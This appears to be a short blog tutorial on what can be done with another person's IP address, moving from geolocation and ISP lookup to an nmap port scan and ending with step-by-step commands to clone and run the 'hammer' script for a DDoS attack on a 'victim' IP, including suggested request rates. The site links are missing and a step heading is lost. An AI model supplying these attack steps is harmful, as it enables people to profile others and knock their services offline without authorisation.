Today we will learn what we can do by getting someone’s IP address. Have a nice reading!
1) Determine a sample location by IP.
Go to the site –
By default, your IP address is there. Enter any IP address there and get an approximate location on the map.
2) Find out the ISP by IP.
Go to the site –
There is also your IP. Enter the desired address and get the ISP first line.
The name of your provider is in the ISP column.
To do this, go to the same site –
We also hang the desired IP and go down to the Client Properties. tab.
Here we look for Operating system and we see to the right of it the operating system.
You can also see here the screen resolution of the user.
4)Find open ports of IP address.
As you may have guessed, we will use the NMAP utility. It is already pre-installed in Kali Linux and Parrot OS.
First we open the terminal and ask for root access.
If you need a password, type in your own, or toor.
Now let’s look at the parameters we’re going to need.
You can enter such a command and get help working with the utility.
Here we are interested in the SCAN TECHNIQUES part, namely the -sT and -sU parameters.
-sT is needed to scan TCP ports.
-sU is needed to scan UDP ports.
We get this command:
nmap -sT -sU 127.0.0.1
Scanning can take quite a long time, but you can recognize the progress of the scan. To do this, just click Enter.
In the end you get all open TCP and UDP ports.
5) Start a DDOS attack on an IP address.
We will need the same Kali or Parrot to hit the IP.
First, we’ll clone the repository.
git clone https://github.com/cyweb/hammer.git.
And now let’s update the repositories and install the latest version of Python 3.
apt update apt upgrade apt install python3
Now let’s go to the script directory
Let’s run the script:
python3 hammer.py -h
First, let’s parse the script parameters:
-h shows the help window (As we have already started).
-s here we enter the IP victims
-p choose which port to finish on.
-t are requests per second. The more you specify, the faster packages will be sent, but if you specify more than 250-300, the script may work at all. So I recommend to set it from zero to 220.
We get this command.
python3 hammer.py -s 127.0.0.1 -p 80 -t 200
